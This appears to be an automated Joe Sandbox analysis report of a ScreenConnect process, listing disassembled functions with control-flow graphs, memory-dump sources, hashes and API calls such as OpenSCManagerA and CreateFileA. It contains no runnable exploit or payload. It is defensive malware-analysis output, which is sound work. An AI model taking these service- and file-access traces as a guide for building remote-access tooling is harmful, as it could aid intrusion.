                                                                                                                                                                                                                                                          • Instruction ID: 5f0206dbbc19be7f61b34124abca2897f45bd2407a41d842fc13bd121a78e319
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34399d592e59cf4862e96fedd7110e841584acb1fb566f36afa0ad227076a987
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26A18D35A00609AFCB45EF68D941A9EBBF2EF84624B14C869E515EF310DF30ED068F91
                                                                                                                                                                                                                                                          Function 015C91B8 Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 165 15c91b8-15c91ec 166 15c91f3-15c91f8 165->166 167 15c91fa-15c9200 166->167 168 15c9210-15c9214 166->168 171 15c9204-15c920e 167->171 172 15c9202 167->172 169 15c9216-15c921c 168->169 170 15c9222-15c9239 168->170 173 15c921e 169->173 174 15c9220 169->174 171->168 172->168 173->170 174->170
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: t*s$t*s
                                                                                                                                                                                                                                                          • API String ID: 0-800204968
                                                                                                                                                                                                                                                          • Opcode ID: ad3b5cf2a5614c1af2ed8ce0a30dd2afdeba807ccbbb7e1ff1365f1d447a0e90
                                                                                                                                                                                                                                                          • Instruction ID: 73c2ceccba1f1a34359bb5c8a44ad9948e5fc8ff4409892164e86c4e30049fc9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad3b5cf2a5614c1af2ed8ce0a30dd2afdeba807ccbbb7e1ff1365f1d447a0e90
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80115E71F00209AFEB24CEA9D800AAFB7F6BB84B10F14C969E555DB254E7729901CB90
                                                                                                                                                                                                                                                          Function 05881676 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 287 5881676-58816d9 289 58816db-58816e5 287->289 290 5881712-5881730 287->290 289->290 291 58816e7-58816e9 289->291 297 5881769-58817c1 OpenSCManagerA 290->297 298 5881732-588173c 290->298 292 58816eb-58816f5 291->292 293 588170c-588170f 291->293 295 58816f9-5881708 292->295 296 58816f7 292->296 293->290 295->295 299 588170a 295->299 296->295 304 58817ca-5881802 297->304 305 58817c3-58817c9 297->305 298->297 300 588173e-5881740 298->300 299->293 302 5881742-588174c 300->302 303 5881763-5881766 300->303 306 588174e 302->306 307 5881750-588175f 302->307 303->297 312 5881812-5881816 304->312 313 5881804-5881808 304->313 305->304 306->307 307->307 308 5881761 307->308 308->303 315 5881818-588181c 312->315 316 5881826 312->316 313->312 314 588180a 313->314 314->312 315->316 317 588181e 315->317 318 5881827 316->318 317->316 318->318
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • OpenSCManagerA.SECHOST(?,?,?), ref: 058817AB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1909411232.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_5880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ManagerOpen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1889721586-0
                                                                                                                                                                                                                                                          • Opcode ID: 04557c0e5f819f50ed235b11f4661872fd4c68d65bce7b8f4c7e01f6756a9358
                                                                                                                                                                                                                                                          • Instruction ID: 0493de13a8a659f8ca8c38d857d3cbadfa3263037df622fd2bd2345df3c01a49
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04557c0e5f819f50ed235b11f4661872fd4c68d65bce7b8f4c7e01f6756a9358
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D515871D107599FDB14EFA8C8897AEBBF1FB08710F14812DE855EB284DB749882CB91
                                                                                                                                                                                                                                                          Function 05881680 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 319 5881680-58816d9 320 58816db-58816e5 319->320 321 5881712-5881730 319->321 320->321 322 58816e7-58816e9 320->322 328 5881769-58817c1 OpenSCManagerA 321->328 329 5881732-588173c 321->329 323 58816eb-58816f5 322->323 324 588170c-588170f 322->324 326 58816f9-5881708 323->326 327 58816f7 323->327 324->321 326->326 330 588170a 326->330 327->326 335 58817ca-5881802 328->335 336 58817c3-58817c9 328->336 329->328 331 588173e-5881740 329->331 330->324 333 5881742-588174c 331->333 334 5881763-5881766 331->334 337 588174e 333->337 338 5881750-588175f 333->338 334->328 343 5881812-5881816 335->343 344 5881804-5881808 335->344 336->335 337->338 338->338 339 5881761 338->339 339->334 346 5881818-588181c 343->346 347 5881826 343->347 344->343 345 588180a 344->345 345->343 346->347 348 588181e 346->348 349 5881827 347->349 348->347 349->349
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • OpenSCManagerA.SECHOST(?,?,?), ref: 058817AB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1909411232.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_5880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ManagerOpen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1889721586-0
                                                                                                                                                                                                                                                          • Opcode ID: f55cc3940d1d1b6d1ccf5349d84d126feff2dde15d076410bc72bacf4f39d089
                                                                                                                                                                                                                                                          • Instruction ID: f6c878a7a504c6cd032b6933cb5a76dcba4c771011b8b2b4a3b7d3f84c50b3b9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f55cc3940d1d1b6d1ccf5349d84d126feff2dde15d076410bc72bacf4f39d089
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43514871D107599FDB14EFA8C8897AEBBF1FB08710F14812DE855EB284DB749882CB91
                                                                                                                                                                                                                                                          Function 0463D475 Relevance: 1.6, APIs: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 350 463d475-463d4dc 351 463d530-463d5b3 CreateFileA 350->351 352 463d4de-463d503 350->352 361 463d5b5-463d5bb 351->361 362 463d5bc-463d5fa 351->362 352->351 355 463d505-463d507 352->355 356 463d52a-463d52d 355->356 357 463d509-463d513 355->357 356->351 359 463d517-463d526 357->359 360 463d515 357->360 359->359 363 463d528 359->363 360->359 361->362 367 463d60a 362->367 368 463d5fc-463d600 362->368 363->356 370 463d60b 367->370 368->367 369 463d602 368->369 369->367 370->370
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0463D59D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1909012789.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_4630000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                                          • Opcode ID: bbd5400cc41b70aeb0a2a736832ac48d713c895840514fa0591ea653e92a0e06
                                                                                                                                                                                                                                                          • Instruction ID: 781bd1a6bfce8ed2dc70f11bae4da81b754f6b5c030605011a1d88c06a5d8598
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbd5400cc41b70aeb0a2a736832ac48d713c895840514fa0591ea653e92a0e06
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 025117B1D002999FDB10CFA9C945B9EBBF1BB48318F14812AE818AB391E7759845CF91
                                                                                                                                                                                                                                                          Function 0463BA10 Relevance: 1.6, APIs: 1, Instructions: 119fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 371 463ba10-463d4dc 373 463d530-463d5b3 CreateFileA 371->373 374 463d4de-463d503 371->374 383 463d5b5-463d5bb 373->383 384 463d5bc-463d5fa 373->384 374->373 377 463d505-463d507 374->377 378 463d52a-463d52d 377->378 379 463d509-463d513 377->379 378->373 381 463d517-463d526 379->381 382 463d515 379->382 381->381 385 463d528 381->385 382->381 383->384 389 463d60a 384->389 390 463d5fc-463d600 384->390 385->378 392 463d60b 389->392 390->389 391 463d602 390->391 391->389 392->392
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0463D59D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1909012789.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_4630000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                                          • Opcode ID: 7e1b79053d5c57370be28abf0cb4c9de0dc6579815b392965f958281e3760e3d
                                                                                                                                                                                                                                                          • Instruction ID: 0ba9c5e86d0d1cfbfe6256b4e74a60e1bab7eb4ecbb7e2b4fbffd58485397f7f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e1b79053d5c57370be28abf0cb4c9de0dc6579815b392965f958281e3760e3d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C5127B1D003999FDB10CFA9C944B9EBBF1FB48318F148129E818AB391E775A845CF95
                                                                                                                                                                                                                                                          Function 015CFB40 Relevance: 1.6, Strings: 1, Instructions: 316COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 393 15cfb40-15cfb87 call 15c7390 * 2 398 15cfb89-15cfbb4 393->398 399 15cfbba-15cfbbe 393->399 398->399 400 15cfbc0-15cfbeb 399->400 401 15cfbf1-15cfbf5 399->401 400->401 402 15cfc0b-15cfc0f 401->402 403 15cfbf7-15cfc05 401->403 405 15cfc3b-15cfccd 402->405 406 15cfc11-15cfc35 402->406 403->402 412 15cfccf-15cfcfc 405->412 413 15cfd02-15cfd06 405->413 406->405 412->413 414 15cfd08-15cfd1c 413->414 415 15cfd22-15cfd26 413->415 414->415 418 15cfd28-15cfd3c 415->418 419 15cfd42-15cfd46 415->419 418->419 421 15cfd48-15cfd5c 419->421 422 15cfd62-15cfd66 419->422 421->422 423 15cfd7c-15cfd80 422->423 424 15cfd68-15cfd76 422->424 427 15cfd96-15cfd9a 423->427 428 15cfd82-15cfd90 423->428 424->423 429 15cfd9c-15cfdaa 427->429 430 15cfdb0-15cfdb4 427->430 428->427 429->430 431 15cfdca-15cfdce 430->431 432 15cfdb6-15cfdc4 430->432 433 15cfdd0-15cfdfb 431->433 434 15cfe01-15cfe05 431->434 432->431 433->434 435 15cfe07-15cfe15 434->435 436 15cfe51-15cfe58 434->436 435->436 438 15cfe17 435->438 439 15cfe1a-15cfe1f 438->439 441 15cfe59-15cfed9 call 15c74f8 439->441 442 15cfe21-15cfe32 439->442 455 15cff1c-15cff1d 441->455 456 15cfedb-15cfef1 441->456 443 15cfe3d-15cfe4f 442->443 444 15cfe34-15cfe37 442->444 443->436 443->439 444->443 458 15cff28-15cff2d 455->458 459 15cfefa-15cff1a 456->459 460 15cfef3 456->460 459->455 460->459
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                                          • Opcode ID: 3c9d4b1948fe044e115334f1b9daad532bc17edabb637cd3553bb4051d56f5a1
                                                                                                                                                                                                                                                          • Instruction ID: 7fb62874877733257594f31ed31f91202f394d5bacaa5b24f71d218c02c0a88e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c9d4b1948fe044e115334f1b9daad532bc17edabb637cd3553bb4051d56f5a1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92D14C75A40705CFCB04DFA8D884A99B7B2FF89710B118659E919AF362DB30EC85CF90
                                                                                                                                                                                                                                                          Function 03CF1062 Relevance: 1.5, Strings: 1, Instructions: 278COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 463 3cf1062-3cf1076 465 3cf1078-3cf1079 463->465 465->465 466 3cf107b-3cf10a6 465->466 467 3cf10a8-3cf10b1 466->467 467->467 468 3cf10b3-3cf10cc 467->468 469 3cf10ce-3cf1136 call 3cf17bf 468->469 470 3cf1148-3cf1175 468->470 492 3cf113e 469->492 476 3cf11b8-3cf131e 470->476 477 3cf1177-3cf118d 470->477 516 3cf1327-3cf13e5 476->516 481 3cf118f 477->481 482 3cf1196-3cf11b6 477->482 481->482 482->476 492->470
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: {!v
                                                                                                                                                                                                                                                          • API String ID: 0-1174554413
                                                                                                                                                                                                                                                          • Opcode ID: 1e38db2861893a07dc5b2d49a151e5790a82ee3a1548092b7e50efc40657e4b6
                                                                                                                                                                                                                                                          • Instruction ID: 8fccdaea8e53b48b812aa706eae7311449cbcbf617545780d1856a025fd23251
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e38db2861893a07dc5b2d49a151e5790a82ee3a1548092b7e50efc40657e4b6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFA1F5306007499FC702EB79E9616CDBBF1FF45224B048A9DD046DF252DB74AE08CBA6
                                                                                                                                                                                                                                                          Function 03CF10D0 Relevance: 1.5, Strings: 1, Instructions: 211COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 603 3cf10d0-3cf1175 call 3cf17bf 615 3cf11b8-3cf131e 603->615 616 3cf1177-3cf118d 603->616 650 3cf1327-3cf13e5 615->650 619 3cf118f 616->619 620 3cf1196-3cf11b6 616->620 619->620 620->615
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: {!v
                                                                                                                                                                                                                                                          • API String ID: 0-1174554413
                                                                                                                                                                                                                                                          • Opcode ID: 27da570cf88f273d7a0adafe722a980649f3c4830f227282af0571121b106ec3
                                                                                                                                                                                                                                                          • Instruction ID: bc8066c9a30ab1f22c4cefd90c42d2cc91ce93cffc91c215248db38ea011e2aa
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27da570cf88f273d7a0adafe722a980649f3c4830f227282af0571121b106ec3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A819070A0070A9FC715EB75D951B9EB7E2FF84324B008A2CD046DB751EB75AE088BD6
                                                                                                                                                                                                                                                          Function 03CF2100 Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 666 3cf2100-3cf2101 667 3cf20d3-3cf20d7 666->667 668 3cf2103-3cf2138 666->668 667->666 670 3cf213d-3cf216d 668->670 671 3cf213a 668->671 676 3cf216f-3cf217b 670->676 677 3cf217d 670->677 671->670 678 3cf217f-3cf218f 676->678 677->678 681 3cf2195-3cf21a4 678->681 682 3cf2212-3cf2220 678->682 685 3cf21a6-3cf21b2 681->685 686 3cf21b4 681->686 687 3cf2222-3cf222e 682->687 688 3cf2230 682->688 690 3cf21b6-3cf21c1 685->690 686->690 689 3cf2232-3cf2242 687->689 688->689 697 3cf22cb-3cf22e3 689->697 698 3cf2248-3cf225d 689->698 695 3cf21cb-3cf21e9 690->695 696 3cf21c3 690->696 706 3cf21eb-3cf21f7 695->706 707 3cf21f9 695->707 696->695 704 3cf22e5-3cf230d 697->704 705 3cf2310-3cf2336 697->705 702 3cf225f-3cf226b 698->702 703 3cf226d 698->703 709 3cf226f-3cf227a 702->709 703->709 704->705 714 3cf2338-3cf2344 705->714 715 3cf2346 705->715 708 3cf21fb-3cf220f 706->708 707->708 708->682 718 3cf227c 709->718 719 3cf2284-3cf22a2 709->719 721 3cf2349-3cf2358 714->721 715->721 718->719 729 3cf22a4-3cf22b0 719->729 730 3cf22b2 719->730 727 3cf235a-3cf2366 721->727 728 3cf2368 721->728 731 3cf236a-3cf2378 727->731 728->731 732 3cf22b4-3cf22c8 729->732 730->732 737 3cf237a-3cf2386 731->737 738 3cf2388 731->738 732->697 740 3cf238a-3cf238c 737->740 738->740 743 3cf238e call 3cf28d0 740->743 744 3cf238e call 3cf28e0 740->744 742 3cf2394-3cf239b 743->742 744->742
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: [$q
                                                                                                                                                                                                                                                          • API String ID: 0-2640076843
                                                                                                                                                                                                                                                          • Opcode ID: ef07880973db2ff5682598f35ba8faa2be6a485c11130d4f45ef8483e3d04aa0
                                                                                                                                                                                                                                                          • Instruction ID: 8b858ff1ce707e6584d5d3aa063e463386d121f312872c2c18510ecc0e0fb018
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef07880973db2ff5682598f35ba8faa2be6a485c11130d4f45ef8483e3d04aa0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A871923570020A8FCB55DBA8C450A6EB7B6FFC8620B14C56DC505DF354DB34ED068B91
                                                                                                                                                                                                                                                          Function 03CF2110 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 745 3cf2110-3cf2138 747 3cf213d-3cf216d 745->747 748 3cf213a 745->748 753 3cf216f-3cf217b 747->753 754 3cf217d 747->754 748->747 755 3cf217f-3cf218f 753->755 754->755 758 3cf2195-3cf21a4 755->758 759 3cf2212-3cf2220 755->759 762 3cf21a6-3cf21b2 758->762 763 3cf21b4 758->763 764 3cf2222-3cf222e 759->764 765 3cf2230 759->765 767 3cf21b6-3cf21c1 762->767 763->767 766 3cf2232-3cf2242 764->766 765->766 774 3cf22cb-3cf22e3 766->774 775 3cf2248-3cf225d 766->775 772 3cf21cb-3cf21e9 767->772 773 3cf21c3 767->773 783 3cf21eb-3cf21f7 772->783 784 3cf21f9 772->784 773->772 781 3cf22e5-3cf230d 774->781 782 3cf2310-3cf2336 774->782 779 3cf225f-3cf226b 775->779 780 3cf226d 775->780 786 3cf226f-3cf227a 779->786 780->786 781->782 791 3cf2338-3cf2344 782->791 792 3cf2346 782->792 785 3cf21fb-3cf220f 783->785 784->785 785->759 795 3cf227c 786->795 796 3cf2284-3cf22a2 786->796 798 3cf2349-3cf2358 791->798 792->798 795->796 806 3cf22a4-3cf22b0 796->806 807 3cf22b2 796->807 804 3cf235a-3cf2366 798->804 805 3cf2368 798->805 808 3cf236a-3cf2378 804->808 805->808 809 3cf22b4-3cf22c8 806->809 807->809 814 3cf237a-3cf2386 808->814 815 3cf2388 808->815 809->774 817 3cf238a-3cf238c 814->817 815->817 820 3cf238e call 3cf28d0 817->820 821 3cf238e call 3cf28e0 817->821 819 3cf2394-3cf239b 820->819 821->819
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: [$q
                                                                                                                                                                                                                                                          • API String ID: 0-2640076843
                                                                                                                                                                                                                                                          • Opcode ID: 98a582bf268fd92990e4685d26e510aacd01832fc5901dd1cfd737e3457965b4
                                                                                                                                                                                                                                                          • Instruction ID: 86b43b551930c12853b01a1834a9f79cfc19e23eb91467ca123726fa71e89ad2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98a582bf268fd92990e4685d26e510aacd01832fc5901dd1cfd737e3457965b4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E717D35B0020A8FCB45EBA9C490A6EF3F6FFC8620B24856DD505DB394DB74ED028B91
                                                                                                                                                                                                                                                          Function 015C5DF0 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 822 15c5df0-15c5e4f call 15c0420 832 15c5fda-15c5fe1 822->832 833 15c5e55-15c5e60 822->833 833->832 835 15c5e66-15c5e7d call 15c59e0 833->835 838 15c5e7f-15c5e95 835->838 839 15c5ec0-15c5ecf 835->839 844 15c5e9e-15c5ebe 838->844 845 15c5e97 838->845 842 15c5edf-15c5ee8 839->842 843 15c5ed1-15c5edd 839->843 846 15c5eea-15c5f10 842->846 847 15c5f12-15c5f17 842->847 843->842 844->839 845->844 846->847 850 15c5f1f-15c5f35 847->850 857 15c5fa5-15c5fbe 850->857 858 15c5f37-15c5f5e 850->858 862 15c5fc9-15c5fca 857->862 863 15c5fc0 857->863 867 15c5f98-15c5fa3 858->867 868 15c5f60-15c5f87 858->868 862->832 863->862 867->857 867->858 868->867 873 15c5f89-15c5f96 868->873 873->857
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: nCq
                                                                                                                                                                                                                                                          • API String ID: 0-2853737484
                                                                                                                                                                                                                                                          • Opcode ID: 8c9a05882603b32e37b092dba6a02cef1daa31b00c8cbfca7d48c9266d4435da
                                                                                                                                                                                                                                                          • Instruction ID: c52ae02741a1779842197873fcebaccbab7dc37314df09d19e9e98423fa7f770
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c9a05882603b32e37b092dba6a02cef1daa31b00c8cbfca7d48c9266d4435da
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE51AD717102068FDB15EFB8D954AAE77E2BF88A14B10847CE406DB361EF74EC069B91
                                                                                                                                                                                                                                                          Function 015C5DEB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: nCq
                                                                                                                                                                                                                                                          • API String ID: 0-2853737484
                                                                                                                                                                                                                                                          • Opcode ID: 0eb021f356c5c162ea20e331b1e13ea2c4069c6e6b9380e7ce91e68323828a9d
                                                                                                                                                                                                                                                          • Instruction ID: 9d75eeb2d97798e428b1c2d6de3e64becc4f4abbd86bb487a7e45beddbc4666b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0eb021f356c5c162ea20e331b1e13ea2c4069c6e6b9380e7ce91e68323828a9d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1519F707102068FDB15EFB8D954A6E77E2BF88A14B10846CE406DB361EF74EC069B91
                                                                                                                                                                                                                                                          Function 015C5DC0 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: nCq
                                                                                                                                                                                                                                                          • API String ID: 0-2853737484
                                                                                                                                                                                                                                                          • Opcode ID: ba5975b8087efb469e30b91ca839bd48a795b58274a450aa7e3cc9ccbd29c4a7
                                                                                                                                                                                                                                                          • Instruction ID: 0430fc22b1d02c98553e4e2e3711acf7e4d2151a96146b383cb6357c54672b52
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba5975b8087efb469e30b91ca839bd48a795b58274a450aa7e3cc9ccbd29c4a7
